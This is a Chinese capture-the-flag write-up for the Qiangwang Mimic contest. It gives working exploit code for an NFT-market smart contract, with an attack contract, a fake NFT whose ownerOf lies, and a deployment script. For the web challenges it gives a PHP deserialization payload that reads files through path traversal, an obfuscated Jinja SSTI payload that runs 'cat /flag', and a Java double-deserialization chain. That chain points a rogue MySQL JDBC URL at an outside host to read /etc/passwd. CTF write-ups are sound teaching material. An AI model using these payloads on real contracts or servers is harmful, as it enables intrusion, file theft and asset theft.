强网拟态小结-blockchian&web

blockchain

分析

做法其实和TCTF的那个nft差不多，但版本修改了abi编码的漏洞不再有用，所以最后买nft3的步骤是有差别的，但前两个是一样的。

• 从airdrop可以拿5个token，直接买NFT1
• 挂NFT1低价 然后用purchasetest挂高价NFT1让NFTMARKET去买高价的NFT然后就有钱买NFT2了
• 造一个假的nft3放到order的第一个，在purchaseWithCoupon里面事先会_deleteOrder一次，然后再获取我们假的nft的owner（也就是我们自己），最后getOrder(coupon.orderId).nftAddress（这也是唯一和tctf不一样的地方）获取真的nft3，但此时owner是我们自己，所以最后safeTransferFrom这里导致最后能够修改真正nft3的拥有者。

攻击

攻击合约

pragma solidity 0.8.16;

import "./source.sol";
contract Attack {

    CtfMarket public ctfMarket;
    address public account;
    CtfNFT public ctfNFT;
    CtfToken public ctfToken;
    HackerNFT public HackerNft;

    function setCtfMarket_addr(address addr) public {
        ctfMarket = CtfMarket(addr);
        ctfNFT= CtfNFT(address(ctfMarket.ctfNFT()));
        ctfToken=CtfToken(address(ctfMarket.ctfToken()));
        HackerNft = new HackerNFT(address(ctfMarket),address(ctfMarket.verifier()),address(account));
    }
    function setaccount(address addr) public {
        account = addr;

    }
    function attack11() public{
        ctfToken.airdrop();
        ctfMarket.createOrder(address(HackerNft),3,1);
        this.approve(address(this), 1);
        ctfToken.approve(address(ctfMarket),200000000000);
        ctfToken.approve(address(ctfNFT),200000000000);
        ctfToken.approve(address(ctfToken),200000000000);
        ctfMarket.purchaseOrder(0);
    }

    function attack2() public {
        ctfMarket.createOrder(address(ctfNFT),1,1);
        ctfNFT.setApprovalForAll(address(ctfMarket),true);
        ctfMarket.purchaseTest(address(ctfNFT),1,1337);
        ctfMarket.purchaseOrder(1);
        ctfMarket.purchaseOrder(1);
    }
    function approve(address a,uint b) public {

    }
    function safeTransferFrom(address a,address b,uint c) public {

    }

    function getFakenft() public returns (address){
        return address(HackerNft);
    }
    function ownerOf(uint dd) public returns (address){
        if(dd==2){
            return address(this);
        }else if(dd==3){
            return address(account);
        }

    }


    function attackfor3(uint8 v, bytes32 r, bytes32 s) public {

        SignedCoupon memory scoupon;
        ctfNFT.setApprovalForAll(account,true);
        ctfToken.approve(address(account),200000000000);
        scoupon.coupon.orderId=0;
        scoupon.coupon.newprice=1;
        scoupon.coupon.issuer=address(account);
        scoupon.coupon.user=address(this);
        scoupon.coupon.reason="";
        scoupon.signature.v=v;
        scoupon.signature.rs[0]=r;
        scoupon.signature.rs[1]=s;
        ctfMarket.purchaseWithCoupon{gas:200000}(scoupon);

    }

    function attack4() public {
        ctfNFT.setApprovalForAll(account,true);
        ctfMarket.win();
        ctfNFT.transferFrom(address(this),address(account),1);
        ctfNFT.transferFrom(address(this),address(account),2);
        ctfNFT.transferFrom(address(this),address(account),3);
    }

    function onERC721Received(address, address, uint256, bytes memory) public pure returns (bytes4) {
        return this.onERC721Received.selector;
    }
}
contract AA {

    function onERC721Received(address, address, uint256, bytes memory) public pure returns (bytes4) {
        return this.onERC721Received.selector;
    }

    address issuer;
    address user;
    uint256 newprice;
    bytes reason;
    Order order;
    bytes32 public hashl;
    event deb(
         address  _issuer,
        address  _user,
        Order  order,
        uint newprice,
        bytes reason
    );
    function setinit(address _issuer, address _user, uint _newprice, address _nftaddress, uint _price, uint _tokenId) public {
        issuer = _issuer;
        user = _user;
        newprice = _newprice;
        order.nftAddress = _nftaddress;
        order.price = _price;
        order.tokenId = _tokenId;

        bytes memory serialized = abi.encode(
            "I, the issuer", issuer,
            "offer a special discount for", user,
            "to buy", order, "at", newprice,
            "because", ""
        );
        hashl = keccak256(serialized);
        emit deb(issuer,user,order,newprice,"");
    }

    function calcsign(bytes32 _ha,uint8 v, bytes32 r, bytes32 s) public view returns(address){
        return ecrecover(_ha, v, r, s);
    }

}
contract HackerNFT is ERC721, Ownable {
    address public Market;
    address public Verifier;
    address public Hacker;
    address public Me;

    constructor(
        address _marketAddress,
        address _verifierAddress,
        address _me
    ) ERC721("HackerNFT", "NFT") public  {
        Market = _marketAddress;
        Verifier = _verifierAddress;
        Hacker = msg.sender;
        Me = _me;
        _setApprovalForAll(address(this), Hacker, true);
        _setApprovalForAll(address(Market), Hacker, true);
    }

    function mint(address to, uint256 tokenId) external onlyOwner {
        _mint(to, tokenId);
    }

    function ownerOf(uint256 tokenId) public view override returns (address) {
        if (msg.sender == Verifier) {
            return Me;
        } else if (msg.sender == Market) {
            return Market;
        } else {
            return Hacker;
        }
    }
}

攻击脚本，本地私链一键部署和攻击

import solcx
from solcx import compile_files
from web3 import Web3,HTTPProvider
from hexbytes import *

def generate_tx(chainID, to, data, value):
    # print(web3.eth.gasPrice)
    # print(web3.eth.getTransactionCount(Web3.toChecksumAddress(account_address)))
    txn = {
        'chainId': chainID,
        'from': Web3.toChecksumAddress(account_address),
        'to': to,
        'gasPrice': web3.eth.gasPrice ,
        'gas': 672197400,
        'nonce': web3.eth.getTransactionCount(Web3.toChecksumAddress(account_address)) ,
        'value': Web3.toWei(value, 'ether'),
        'data': data,
    }
    # print(txn)
    return txn

def sign_and_send(txn):
    signed_txn = web3.eth.account.signTransaction(txn, private_key)
    txn_hash = web3.eth.sendRawTransaction(signed_txn.rawTransaction).hex()
    txn_receipt = web3.eth.waitForTransactionReceipt(txn_hash)
    # print("txn_hash=", txn_hash)
    return txn_receipt


def deploy_attack():
    compiled_sol = compile_files(["attack.sol"],output_values=["abi", "bin"],solc_version="0.8.16")
    data = compiled_sol['attack.sol:Attack']['bin']
    # print(data)
    txn = generate_tx(chain_id, '', data, 0)
    txn_receipt = sign_and_send(txn)
    attack_abi = compiled_sol['attack.sol:Attack']['abi']
    # print(txn_receipt)
    if txn_receipt['status'] == 1:
        attack_address = txn_receipt['contractAddress']
        return attack_address,attack_abi
    else:
        exit(0)

def deploy_nft():
    compiled_sol = compile_files(["ctf.sol"],output_values=["abi", "bin"],solc_version="0.8.16")
    data = compiled_sol['ctf.sol:CtfMarket']['bin']
    # print(data)
    txn = generate_tx(chain_id, '', data, 0)
    txn_receipt = sign_and_send(txn)
    attack_abi = compiled_sol['ctf.sol:CtfMarket']['abi']
    # print(txn_receipt)
    if txn_receipt['status'] == 1:
        attack_address = txn_receipt['contractAddress']
        return attack_address,attack_abi
    else:
        exit(0)
def deploy_AA():
    compiled_sol = compile_files(["attack.sol"],output_values=["abi", "bin"],solc_version="0.8.16")
    data = compiled_sol['attack.sol:AA']['bin']
    txn = generate_tx(chain_id, '', data, 0)
    txn_receipt = sign_and_send(txn)
    attack_abi = compiled_sol['attack.sol:AA']['abi']
    # print(txn_receipt)
    if txn_receipt['status'] == 1:
        attack_address = txn_receipt['contractAddress']
        return attack_address,attack_abi
    else:
        exit(0)
def rsv(_hash):
    signed_message = web3.eth.account.signHash(_hash, private_key)
    print(signed_message.messageHash.hex())
    r = '0x'+signed_message.signature.hex()[2:66]
    s = '0x'+signed_message.signature.hex()[66:-2]
    v = '0x'+signed_message.signature.hex()[-2:]
    return r,s,v
if __name__ == '__main__':
    # exp()
    solcx.install_solc('0.8.16')
    rpc = "http://127.0.0.1:8545"
    web3 = Web3(HTTPProvider(rpc))
    private_key = 'c2aa19cf83ba45863a005ed560c8c84c1f0ca38eaf5123c6cc88d67c3a9c3f03'
    acct = web3.eth.account.from_key(private_key)
    account_address = acct.address
    chain_id = 5777
    print("[+] account_address is " + str(account_address))
    print("[+] account_Balance is " + str(web3.eth.getBalance(account_address)))

    # attack_key = '8428b975e270727086349607d6a4d3941ce22176b89e148f956d56fce364175c'
    # acct = web3.eth.account.from_key(private_key)
    # account_address = acct.address

    #calc signature
    AA_address,AA_abi = deploy_AA()
    AA_instance = web3.eth.contract(address=AA_address, abi=AA_abi)
    print(AA_instance.all_functions())

    contract_address,contract_abi = deploy_nft()
    contract_instance = web3.eth.contract(address=contract_address, abi=contract_abi)
    print(contract_instance.all_functions())

    signed_tx = contract_instance.functions.ctfNFT().call()
    print("[+] ctfNFT_address is " + signed_tx)
    signed_tx = contract_instance.functions.ctfNFT().call()
    print("[+] ctfmarket_address is " + contract_address)
    signed_tx = contract_instance.functions.ctfToken().call()
    print("[+] ctfToken_address is " + signed_tx)
    signed_tx = contract_instance.functions.verifier().call()
    print("[+] verifier_address is " + signed_tx)

    attack_address,attack_abi = deploy_attack()
    attack_instance = web3.eth.contract(address=attack_address, abi=attack_abi)
    print(attack_instance.all_functions())
    print("[+] attack_address is " + attack_address)


    #attack.setaccount()
    functionSign = HexBytes(web3.sha3(text='setaccount(address)')).hex()[0:10]
    setaccount_addr = generate_tx(chain_id, attack_address,functionSign + "000000000000000000000000" + account_address[2:], 0)
    sign_and_send(setaccount_addr)
    print("[+] account_address is " + attack_instance.functions.account().call())

    #attack.setCtfMarket_addr()
    functionSign = HexBytes(web3.sha3(text='setCtfMarket_addr(address)')).hex()[0:10]
    setCtfMarket_addr = generate_tx(chain_id, attack_address, functionSign + "000000000000000000000000" + contract_address[2:],0)
    sign_and_send(setCtfMarket_addr)
    print("[+] CtfMarket_address is " + attack_instance.functions.ctfMarket().call())


    #attack.attack11()
    functionSign = HexBytes(Web3.sha3(text='attack11()')).hex()[0:10]
    attack11_addr = generate_tx(chain_id, attack_address,functionSign, 0)
    sign_and_send(attack11_addr)
    #contract.getOrder[0]
    print("[+] order[0] is " + str(contract_instance.functions.getOrder(0).call()))

    #attack.attack2()
    functionSign = HexBytes(Web3.sha3(text='attack2()')).hex()[0:10]
    attack2_addr = generate_tx(chain_id, attack_address,functionSign, 0)
    sign_and_send(attack2_addr)
    print("[+] order[0] is " + str(contract_instance.functions.getOrder(0).call()))
    print("[+] order[1] is " + str(contract_instance.functions.getOrder(1).call()))
    fakeNft_address = attack_instance.functions.HackerNft().call()
    print("[+] fakeNft_address is " +  fakeNft_address)

    #AA.setinit
    data = '''0xc2af3f15
    000000000000000000000000{}
    000000000000000000000000{}
    0000000000000000000000000000000000000000000000000000000000000001
    000000000000000000000000{}
    0000000000000000000000000000000000000000000000000000000000000001
    0000000000000000000000000000000000000000000000000000000000000003
    '''.format(account_address[2:],attack_address[2:],fakeNft_address[2:]).replace('\n','').replace(' ','')
    # print(data)
    functionSign = HexBytes(Web3.sha3(text='setinit(address,address,uint256,address,uint256,uint256)')).hex()[0:10]
    setinit_addr = generate_tx(chain_id, AA_address,data, 0)
    sign_and_send(setinit_addr)

    hash = AA_instance.functions.hashl().call()
    r,s,v = rsv(hash)
    print(v,r,s)

    ##attack.attackfor3()
    data = '''0xf98ecaa700000000000000000000000000000000000000000000000000000000000000{}{}{}'''.format(v[2:],r[2:],s[2:])
    functionSign = HexBytes(Web3.sha3(text='attackfor3(uint8,byte32,byte32)')).hex()[0:10]
    attackfor3_addr = generate_tx(chain_id, attack_address,data, 0)
    sign_and_send(attackfor3_addr)

    ##attack.attack4()
    functionSign = HexBytes(Web3.sha3(text='attack4()')).hex()[0:10]
    attack4_addr = generate_tx(chain_id, attack_address,functionSign, 0)
    sign_and_send(attack4_addr)

    ##ctfMarket.win()
    functionSign = HexBytes(Web3.sha3(text='win()')).hex()[0:10]
    flag_addr = generate_tx(chain_id, contract_address,functionSign, 0)
    flag = sign_and_send(flag_addr)
    print(contract_instance.events.SendFlag().processLog(flag["logs"][0]))

Web

ezus

读源码

/index.php/tm.php/%80?source

字符串逃逸反序列化读hint.php，然后读f1111444449999.txt

username=@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@&password=111111111111";O:5:"order":3:{s:1:"f";s:7:"trypass";s:4:"hint";s:57:"mochu7://prankhub/../../../../../../../f1111444449999.txt";}

WHOYOUARE

nodejs 原型链污染，使用constructor.prototype代替__proto__，使用1来覆盖数组的第二个数据。运行两次。

没有人比我更懂py

ssti网上搜搜payload

{{''['\137\137\143\154\141\163\163\137\137']['\137\137\142\141\163\145\163\137\137'][0]['\137\137\163\165\142\143\154\141\163\163\145\163\137\137']()[132]['\137\137\151\156\151\164\137\137']['\137\137\147\154\157\142\141\154\163\137\137']['\160\157\160\145\156']('\143\141\164\40\57\146\154\141\147')['\162\145\141\144']()}}

NoRCE

BadAttributeValueExpException调用toString然后connect函数能打二次返序列化。

package com.example.demo.exp;

import com.example.demo.bean.Connect;
import com.example.demo.utils.tools;

import javax.management.remote.JMXServiceURL;
import javax.management.remote.rmi.RMIConnector;
import java.io.*;
import java.lang.reflect.Field;
import java.net.MalformedURLException;
import java.util.Base64;
import javax.management.BadAttributeValueExpException;

public class payload {
    public static  void setFieldValue(Object obj,String key, Object value) throws NoSuchFieldException, IllegalAccessException {
        Field field = obj.getClass().getDeclaredField(key);
        field.setAccessible(true);
        field.set(obj,value);
    }
    public static byte[] serialize(Object o) throws Exception{
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(o);
        oos.close();
        bos.close();
        return bos.toByteArray();
    }
    public static byte[] serialize2(Object o) throws Exception{
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeUTF("s00ABX");
        oos.writeObject(o);
        oos.close();
        bos.close();
        return bos.toByteArray();
    }
    public static Object deserialize(byte[] bytes) throws Exception{
        ByteArrayInputStream bis = new ByteArrayInputStream(bytes);
        ObjectInputStream ois = new ObjectInputStream(bis);
        bis.close();
        ois.close();
        return ois.readObject();
    }
    public static Object getFieldValue(Object obj, String key) throws NoSuchFieldException, IllegalAccessException {
        Field field = obj.getClass().getDeclaredField(key);
        field.setAccessible(true);
        return field.get(obj);
    }
    public static  String getObject() throws Exception {
        com.example.demo.bean.MyBean myBean = new com.example.demo.bean.MyBean("","");
        Connect connect = new Connect("jdbc:mysql://10.91.107.14:2333/kkfine?allowLoadLocalInfile=true&allowUrlInLocalInfile=true&username=fileread_/etc/passwd&password=kkfine","","");
        setFieldValue(myBean,"conn",connect);
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        setFieldValue(badAttributeValueExpException,"val",myBean);
        String payload = new String(Base64.getEncoder().encode(serialize(badAttributeValueExpException)));
        return payload;
    }

    public static void main(String[] args) throws Exception {
        JMXServiceURL jmxServiceURL = new JMXServiceURL("service:jmx:rmi://");
        setFieldValue(jmxServiceURL, "urlPath", "/stub/" + getObject());
        RMIConnector rmiConnector = new RMIConnector(jmxServiceURL, null);

        com.example.demo.bean.MyBean myBean = new com.example.demo.bean.MyBean("","");
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        setFieldValue(badAttributeValueExpException,"val",myBean);
        setFieldValue(myBean,"conn",rmiConnector);

        byte[] payload =  serialize2(badAttributeValueExpException);

        System.out.println(new String(Base64.getEncoder().encode(payload)));
        String data = new String(Base64.getEncoder().encode(payload));
//        deserialize(payload);
        byte[] bytes = tools.base64Decode(data);

        InputStream inputStream = new ByteArrayInputStream(bytes);
        ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);
        String secret = data.substring(0, 6);
        String key = objectInputStream.readUTF();
        if (key.hashCode() == secret.hashCode() && !secret.equals(key)) {
            objectInputStream.readObject();
        }

    }
}